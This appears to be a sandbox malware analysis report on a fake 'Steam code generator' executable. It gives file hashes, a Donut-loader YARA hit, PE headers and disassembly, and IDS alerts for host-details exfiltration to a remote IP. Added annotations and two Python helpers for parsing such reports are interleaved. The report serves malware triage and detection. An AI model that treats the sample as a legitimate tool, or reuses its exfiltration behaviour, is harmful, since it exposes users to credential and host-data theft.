SHA-512: BFECFC20EAA3A62D58EDBFF2B5F69A75A382BFB58AFB3D3CB19FFEDC2A9E7AB3319BF714088B8586613419ECF4FCAC6C04CDA8AB75B0C86BF977F7164D05C463
Malicious: false
Yara Hits:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stm[1].txt, Author: unknown
The source path is a WinINet cache entry, so this is a response the sample process itself downloaded (cached as stm[1].txt); the rule targets Donut-generated shellcode loaders, and the 8-bit entropy of 7.69 indicates an encrypted or compressed body even though the tool's Encrypted heuristic reports false.
                                                                      Preview:..e...e..0g.p.1.....>..E.$*...i..1..........YD(..h'@..b..-.S!.#hz..T2.X!;Ys.N.m0dyD;d9.x.....X..e..S.._..D&g*'ZG..z..)o.M.(C..@...8..H1........Sx[.^U.F.Ne8;IC....-..5Oua...|..x7T.m?H/~..~...9^.......q.u&.....U%=7..]..J.q.Ip.&{.4..[.......`..e......kx<....&..{..U.|..B.6jp)...!l.W{(].&(.y..1..-._.&.S.Nn.X..O..^2.L...%.XoYZ.....+t..z?.....l...+$.u.S./?...8..\7K.P=.m..Z.0..5.6...2]....Y.b.m.mG.Wn$A..Z.6.T._...?~H.U...+.(W]%...&.+..T.n..%..n.U...W.e&m...%..]...A^.).j;{<y.~..m-&........f...<.UP.x..o.dnI..$.p..!.{.rA...E.Yc.9..........................n..R]_..$.._.T.A*.......o.g.2...:/[.N..rx0..91h.3....g.`......zf..C.v.r....&......r.6`..G..L..2.FTb..o..HDKw.F.-.w.}..g).-B-zv......F...g.Q.#a.C.B.!.UZ.s-..S..._Q28KmR...2.NOu...b..'.C3w.b.Q...<..9Q.....`.....D..@x_...q.3.>.9^.bn.......Fc..[...8..f..%..ioT...O...4.5RW.......e.7.A@xz.6...8...u........g........@"..Mp.^....'.k........<...m.O.J.`.$.y...M&.r.Z...h.)!Hp.......>.$....G.X.|It2...8p._.3....
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 11608
Entropy (8bit): 4.890472898059848
Encrypted: false
SSDEEP: 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5: 8A4B02D8A977CB929C05D4BC2942C5A9
SHA1: F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256: 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512: 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious: false
                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1600
                                                                      Entropy (8bit):5.684177275916648
                                                                      Encrypted:false
                                                                      SSDEEP:48:1SU4Yymdax4RIoUP7m9qr9tK8NfxBUICmL6o882:MHYv+IfB9qr2KfnUjmLe
                                                                      MD5:6048C2B80F3FB9BEAAE93AD9882F22C2
                                                                      SHA1:E6EACA319D363A76EFE3C852B6C28A877AE39DC5
                                                                      SHA-256:EB0FB9EAE7D24D7773066307FFCA4379B579FF9E938CA32863995917EC088461
                                                                      SHA-512:DE7FB44922ACE117530971C1A89059342CDDC2008469B7CB51A757755DDC7739C8B2F26C0DFA1FBC0CBE55EC889A7AA45450BEC8AE72BA51C8050F5499695258
                                                                      Malicious:false
                                                                      Preview:@...e...........Q...................R.9.O............@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
(eleven further dropped-file entries identical to the one above are omitted here: each is the same 60-byte "# PowerShell test file to determine AppLocker lockdown mode" file written by powershell.exe, MD5 D17FE0A3F47BE24A6453E9EF58C94641, SHA-256 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7, Malicious:false)
                                                                      Process:C:\Users\user\Desktop\steamcodegenerator.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):46
                                                                      Entropy (8bit):4.898455706009979
                                                                      Encrypted:false
                                                                      SSDEEP:3:i9CLLWD07v:wCLue
                                                                      MD5:2C1D951199DEAC5063E37780D924EDCE
                                                                      SHA1:752DCAF6C502CA0F526BA68E2865129B4157A977
                                                                      SHA-256:E7C4677A9BA467D8FEA67DACCB0B752409FDB2DB344DC6E82A966A313E511D55
                                                                      SHA-512:F154209296157A6D05BC970582409646DCDD7E5F52ED512ACFC4FFCDF549B4BC6D27C3FC7A0AE7C3D38641D4E2CB364FA4BBDF30485286732AF4D1B216D22A47
                                                                      Malicious:false
                                                                      Preview:Generating.....Steam Code: TZVF4-DI30M-P.TQW..
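The dropped-file list above is a flat key:value dump in which the same PowerShell AppLocker probe file (the `__PSScriptPolicyTest_*.ps1` that powershell.exe writes on every start) recurs many times with identical hashes, while the only file written by the sample itself is the 46-byte decoy "Steam Code" text. As an added example, not part of the Joe Sandbox report, here is a small parser that turns such a dump into records, groups them by SHA-256, marks the PowerShell probe file as environment noise and leaves a de-duplicated hash list worth hunting for. The sample text is constructed from four records copied from the listing above (the probe file included twice); only the fields the example needs are kept.

```python
"""Parse the 'dropped files' records of a Joe Sandbox text export and deduplicate them by SHA-256."""
from collections import defaultdict

# Constructed sample: four records copied from the report above, with the PowerShell
# AppLocker probe file appearing twice, as it does many times in the full listing.
SAMPLE = """\
Process:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
File Type:data
Size (bytes):1600
Entropy (8bit):5.684177275916648
MD5:6048C2B80F3FB9BEAAE93AD9882F22C2
SHA-256:EB0FB9EAE7D24D7773066307FFCA4379B579FF9E938CA32863995917EC088461
Malicious:false
Preview:@...e...........Q...................R.9.O............@......
Process:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
File Type:ASCII text, with no line terminators
Size (bytes):60
Entropy (8bit):4.038920595031593
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
File Type:ASCII text, with no line terminators
Size (bytes):60
Entropy (8bit):4.038920595031593
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\\Users\\user\\Desktop\\steamcodegenerator.exe
File Type:data
Size (bytes):46
Entropy (8bit):4.898455706009979
MD5:2C1D951199DEAC5063E37780D924EDCE
SHA-256:E7C4677A9BA467D8FEA67DACCB0B752409FDB2DB344DC6E82A966A313E511D55
Malicious:false
Preview:Generating.....Steam Code: TZVF4-DI30M-P.TQW..
"""

# Content powershell.exe writes itself when it probes AppLocker/WDAC policy; not attacker data.
APPLOCKER_PROBE = "# PowerShell test file to determine AppLocker lockdown mode"


def parse_records(text: str) -> list:
    """Split the key:value dump into one dict per dropped file; a record starts at 'Process:'."""
    records, current = [], None
    for line in text.splitlines():
        if not line.strip() or ":" not in line:
            continue
        key, value = line.strip().split(":", 1)      # only the first colon separates key from value
        key = key.replace("-", "").lower()          # 'SHA-256' and 'SHA256' become the same key
        if key == "process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def is_noise(rec: dict) -> bool:
    """Benign artefacts of the analysis environment that must not become IOCs."""
    return rec.get("preview", "").startswith(APPLOCKER_PROBE)


def dedupe(records: list) -> dict:
    """Group by SHA-256; keep the count, the size and the set of writing processes."""
    groups = defaultdict(lambda: {"count": 0, "processes": set(), "noise": False})
    for rec in records:
        g = groups[rec["sha256"]]
        g["count"] += 1
        g["processes"].add(rec["process"])
        g["size"] = int(rec["size (bytes)"])
        g["noise"] = is_noise(rec)
    return dict(groups)


def iocs(records: list) -> list:
    """SHA-256 values worth hunting for: unique and not environment noise."""
    return sorted(h for h, g in dedupe(records).items() if not g["noise"])


if __name__ == "__main__":
    for sha, g in dedupe(parse_records(SAMPLE)).items():
        print(f"{sha} x{g['count']:<3} {g['size']:>5}B noise={g['noise']} {', '.join(sorted(g['processes']))}")
```

Run against the full export, the probe file collapses to one line with its repeat count and drops out of `iocs()`, which is what you want before pushing hashes into a blocklist or a hunt query.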
                                                                      File type:PE32+ executable (console) x86-64, for MS Windows
                                                                      Entropy (8bit):6.2652516764461375
                                                                      TrID:
                                                                      • Win64 Executable Console (202006/5) 92.65%
                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:steamcodegenerator.exe
                                                                      File size:258'048 bytes
                                                                      MD5:d4f1751389516a3dfac98551142cb153
                                                                      SHA1:f362178e1ecd3eac536b666e89c2aa5663109116
                                                                      SHA256:eb727ad773925864801802b58b3060cfb1a0c18c1be78c8f9e6fc1d2840b19af
                                                                      SHA512:d3e0e04c414c26c37894efe1cdd8adf1970ede58ffac510e17315f4599178706c5ce70d47796900e011f76444e3bb52238a542f60120a7a2a94d96c8ac3d4cab
                                                                      SSDEEP:3072:IyEnMIVkwfjZrzYxopX5SfebFd+l1EkMmLmAvGaQNTxDwYPfMpOEM0UAP+Sg56:ILVDrZrzYapJQebFd+vFMmbTaThQ1UN
                                                                      TLSH:DA447B5577A50CF8EC67827DCC514A0AE6B2BC160760EB9F03A08B5B5F236E09D3E761
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i...j...i...l.1.i...m...i...i...i..lm...i..lj...i..ll...i...h...i...h...i..l`...i..l....i..lk...i.Rich..i........
                                                                      Icon Hash:90cececece8e8eb0
                                                                      Entrypoint:0x140009080
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x140000000
                                                                      Subsystem:windows cui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x67093850 [Fri Oct 11 14:38:08 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f63ec0d9e5630f984a80952b9a46676a
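The header fields above (entrypoint, image base, timestamp, subsystem, the Image File and DLL Characteristics flags, the version fields) and the data-directory table that follows the disassembly are all read straight from the PE32+ headers. As an added example, not part of the Joe Sandbox report, here is a stdlib-only reader that extracts them, resolves each directory RVA to the section that contains it, and treats an empty SECURITY directory as "not Authenticode-signed". It runs against a constructed header carrying the report's values; the section table is invented, because the excerpt does not include one, but laid out so that the directory RVAs resolve to the sections the report names.

```python
"""Stdlib-only reader for the PE32+ header fields that a static sandbox report lists."""
import struct
from datetime import datetime, timezone

DLL_CHARACTERISTICS = {          # IMAGE_DLLCHARACTERISTICS_* (PE/COFF specification)
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE", 0x2000: "DLL"}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}
DIRECTORIES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC", "DEBUG",
               "ARCHITECTURE", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT", "IAT",
               "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]


def flag_names(value: int, table: dict) -> list:
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data: bytes) -> dict:
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]                 # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, nsec, stamp, _, _, opt_size, fchars = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24                                                 # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x20B:
        raise ValueError("only PE32+ is handled here")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    os_maj, os_min, img_maj, img_min, ss_maj, ss_min = struct.unpack_from("<6H", data, opt + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    ndirs = struct.unpack_from("<I", data, opt + 108)[0]
    raw = [struct.unpack_from("<8sII", data, opt + opt_size + 40 * i) for i in range(nsec)]
    sections = [(n.rstrip(b"\0").decode(), va, vs) for n, vs, va in raw]   # (name, VirtualAddress, VirtualSize)

    def section_of(rva: int) -> str:
        return next((n for n, va, vs in sections if va <= rva < va + vs), "")

    dirs = []
    for i in range(min(ndirs, 16)):                               # PE32+ directories start at optional header + 112
        rva, size = struct.unpack_from("<II", data, opt + 112 + 8 * i)
        dirs.append((DIRECTORIES[i], rva, size, section_of(rva) if rva else ""))
    return {
        "machine": machine,
        "timestamp": datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "characteristics": flag_names(fchars, FILE_CHARACTERISTICS),
        "entrypoint": image_base + entry,
        "entrypoint_section": section_of(entry),
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "dll_characteristics": flag_names(dll_chars, DLL_CHARACTERISTICS),
        "os_version": f"{os_maj}.{os_min}",
        "image_version": f"{img_maj}.{img_min}",
        "subsystem_version": f"{ss_maj}.{ss_min}",
        "signed": dirs[4][1] != 0,                                # empty SECURITY directory: no Authenticode signature
        "directories": dirs,
    }


def build_sample() -> bytes:
    """Constructed PE32+ header carrying the values the report lists. The section table is
    invented (the report excerpt has none) so that the directory RVAs resolve as reported."""
    dirs = [(0, 0), (0x3a934, 0x3c), (0x43000, 0x1e0), (0x3f000, 0x2460), (0, 0),
            (0x44000, 0x9a4), (0x36460, 0x70)] + [(0, 0)] * 9
    secs = [(b".text", 0x1000, 0x2f000), (b".rdata", 0x30000, 0xf000), (b".pdata", 0x3f000, 0x2460),
            (b".rsrc", 0x43000, 0x1e0), (b".reloc", 0x44000, 0x9a4)]          # (name, VA, VirtualSize)
    optional = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII",
                           0x20B, 14, 0, 0, 0, 0, 0x9080, 0x1000, 0x140000000, 0x1000, 0x200,
                           6, 0, 6, 0, 6, 0, 0, 0x45000, 0x400, 0, 3, 0x8160,
                           0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    optional += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    coff = struct.pack("<HHIIIHH", 0x8664, len(secs), 0x67093850, 0, 0, len(optional), 0x0022)
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, 0, 0, 0, 0, 0, 0, 0x60000020) for n, va, vs in secs)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    return dos + b"PE\0\0" + coff + optional + table


if __name__ == "__main__":
    for key, value in parse_pe(build_sample()).items():
        print(f"{key}: {value}")
```

For a real file, pass `open(path, "rb").read()` to `parse_pe`; the constructed header only exists so the example runs offline. The timestamp check is the useful one in triage: 0x67093850 decodes to 2024-10-11 14:38:08 UTC, which is what the report shows, so the link timestamp was not zeroed or forged to an obviously wrong date.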
Instruction (entrypoint disassembly; the listing decodes the x64 code in 32-bit mode, so a leading `dec eax` or `inc eax` is a REX prefix rather than an instruction: `dec eax / sub esp, 28h` is `sub rsp, 28h`, `inc eax / push ebx` is `push rbx`, `dec eax / lea ecx, dword ptr [...]` is a RIP-relative `lea rcx`, and `dec eax / cmpxchg dword ptr [...], ecx` is a 64-bit `cmpxchg` on `rcx`. The first six lines are the stock MSVC `mainCRTStartup` stub, `sub rsp, 28h / call __security_init_cookie / add rsp, 28h / jmp __scrt_common_main_seh`; the block after it is `__scrt_acquire_startup_lock`, which reads the TEB pointer (`gs:[30h]`, shown without its segment prefix), takes the thread's stack base from `[rax+8]` and claims the CRT startup lock with an interlocked compare-exchange. Everything shown is compiler-generated CRT startup code.)
                                                                      dec eax
                                                                      sub esp, 28h
                                                                      call 00007FD1B8C9837Ch
                                                                      dec eax
                                                                      add esp, 28h
                                                                      jmp 00007FD1B8C979F7h
                                                                      int3
                                                                      int3
                                                                      dec eax
                                                                      sub esp, 28h
                                                                      call 00007FD1B8C986FCh
                                                                      test eax, eax
                                                                      je 00007FD1B8C97BA3h
                                                                      dec eax
                                                                      mov eax, dword ptr [00000030h]
                                                                      dec eax
                                                                      mov ecx, dword ptr [eax+08h]
                                                                      jmp 00007FD1B8C97B87h
                                                                      dec eax
                                                                      cmp ecx, eax
                                                                      je 00007FD1B8C97B96h
                                                                      xor eax, eax
                                                                      dec eax
                                                                      cmpxchg dword ptr [00034698h], ecx
                                                                      jne 00007FD1B8C97B70h
                                                                      xor al, al
                                                                      dec eax
                                                                      add esp, 28h
                                                                      ret
                                                                      mov al, 01h
                                                                      jmp 00007FD1B8C97B79h
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      dec eax
                                                                      sub esp, 28h
                                                                      test ecx, ecx
                                                                      jne 00007FD1B8C97B89h
                                                                      mov byte ptr [00034681h], 00000001h
                                                                      call 00007FD1B8C97ED1h
                                                                      call 00007FD1B8C998A4h
                                                                      test al, al
jne 00007FD1B8C97B86h
xor al, al
jmp 00007FD1B8C97B96h
call 00007FD1B8CA6B8Bh
test al, al
jne 00007FD1B8C97B8Bh
xor ecx, ecx
call 00007FD1B8C998B4h
jmp 00007FD1B8C97B6Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [00034648h], 00000000h
mov ebx, ecx
jne 00007FD1B8C97BE9h
cmp ecx, 01h
jnbe 00007FD1B8C97BECh
call 00007FD1B8C98672h
test eax, eax
je 00007FD1B8C97BAAh
test ebx, ebx
jne 00007FD1B8C97BA6h
dec eax
lea ecx, dword ptr [00034632h]
call 00007FD1B8CA69AAh
test eax, eax
jne 00007FD1B8C97B92h
dec eax
lea ecx, dword ptr [0003463Ah]
call 00007FD1B8C97B9Ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3a934 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x43000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x3f000 | 0x2460 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x44000 | 0x9a4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x36460 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x36320 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b000 | 0x2e8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x29f40 | 0x2a000 | 2ad535e4366959067e2e60d8aafa7658 | False | 0.5462646484375 | data | 6.492900443589932 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0x102ee | 0x10400 | f45884d9dba838b4f775fb0b6ef92b79 | False | 0.42321213942307695 | data | 4.8807783288878275 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3c000 | 0x2a50 | 0x1400 | 3c0e81b51e51780698ebe5ffc0a838de | False | 0.162890625 | DOS executable (block device driver) | 2.705660946828352 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x3f000 | 0x2460 | 0x2600 | 641900e4b17ed72e996a7af8fcf39302 | False | 0.46895559210526316 | data | 5.255275322700397 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x42000 | 0x1f4 | 0x200 | 093bc688e5029835ff2195256ddf5afd | False | 0.494140625 | data | 3.6328021103092234 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x43000 | 0x1e0 | 0x200 | 9866eeb93e80b773405f3d7936b83641 | False | 0.52734375 | data | 4.7074344725994175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x44000 | 0x9a4 | 0xa00 | 6e22f657667f6504de5a7699c3e54392 | False | 0.496875 | data | 5.389301065625464 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x43060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | VirtualFree, VirtualAlloc, MultiByteToWideChar, Sleep, GetLastError, WriteConsoleW, CreateFileW, HeapSize, GetProcessHeap, SetStdHandle, SetEnvironmentVariableW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetStringTypeW, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, RtlUnwind
WININET.dll | InternetOpenW, InternetOpenUrlW, InternetCloseHandle, InternetReadFile
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-15T15:59:53.331844+0200 | 2857658 | ETPRO MALWARE Win32/Fake Robux Bot Registration | 1 | 192.168.2.4 | 49742 | 162.159.138.232 | 443 | TCP
2024-10-15T16:00:08.497087+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.4 | 49749 | 162.159.138.232 | 443 | TCP
2024-10-15T16:00:16.360221+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.4 | 49763 | 162.159.138.232 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 15:59:26.062680960 CEST | 49735 | 443 | 192.168.2.4 | 140.82.121.3
Oct 15, 2024 15:59:26.062733889 CEST | 443 | 49735 | 140.82.121.3 | 192.168.2.4
Oct 15, 2024 15:59:26.062946081 CEST | 49735 | 443 | 192.168.2.4 | 140.82.121.3
Oct 15, 2024 15:59:26.104198933 CEST | 49735 | 443 | 192.168.2.4 | 140.82.121.3
Oct 15, 2024 15:59:26.104278088 CEST | 443 | 49735 | 140.82.121.3 | 192.168.2.4
Oct 15, 2024 15:59:26.958338022 CEST | 443 | 49735 | 140.82.121.3 | 192.168.2.4
Oct 15, 2024 15:59:26.958431005 CEST | 49735 | 443 | 192.168.2.4 | 140.82.121.3
Oct 15, 2024 15:59:27.099189043 CEST | 49735 | 443 | 192.168.2.4 | 140.82.121.3
Oct 15, 2024 15:59:27.099287033 CEST | 443 | 49735 | 140.82.121.3 | 192.168.2.4
Oct 15, 2024 15:59:27.099874020 CEST | 443 | 49735 | 140.82.121.3 | 192.168.2.4
Oct 15, 2024 15:59:27.099948883 CEST | 49735 | 443 | 192.168.2.4 | 140.82.121.3
Oct 15, 2024 15:59:27.105731964 CEST | 49735 | 443 | 192.168.2.4 | 140.82.121.3
Oct 15, 2024 15:59:27.147423983 CEST | 443 | 49735 | 140.82.121.3 | 192.168.2.4
Oct 15, 2024 15:59:27.481204987 CEST | 443 | 49735 | 140.82.121.3 | 192.168.2.4
Oct 15, 2024 15:59:27.481363058 CEST | 49735 | 443 | 192.168.2.4 | 140.82.121.3
Oct 15, 2024 15:59:27.481481075 CEST | 443 | 49735 | 140.82.121.3 | 192.168.2.4
Oct 15, 2024 15:59:27.481534958 CEST | 443 | 49735 | 140.82.121.3 | 192.168.2.4
Oct 15, 2024 15:59:27.481555939 CEST | 49735 | 443 | 192.168.2.4 | 140.82.121.3
Oct 15, 2024 15:59:27.481607914 CEST | 49735 | 443 | 192.168.2.4 | 140.82.121.3
Oct 15, 2024 15:59:27.493486881 CEST | 49735 | 443 | 192.168.2.4 | 140.82.121.3
Oct 15, 2024 15:59:27.493542910 CEST | 443 | 49735 | 140.82.121.3 | 192.168.2.4
Oct 15, 2024 15:59:27.502625942 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
Oct 15, 2024 15:59:27.502681971 CEST | 443 | 49736 | 185.199.109.133 | 192.168.2.4
Oct 15, 2024 15:59:27.502760887 CEST | 49736 | 443 | 192.168.2.4 | 185.199.109.133
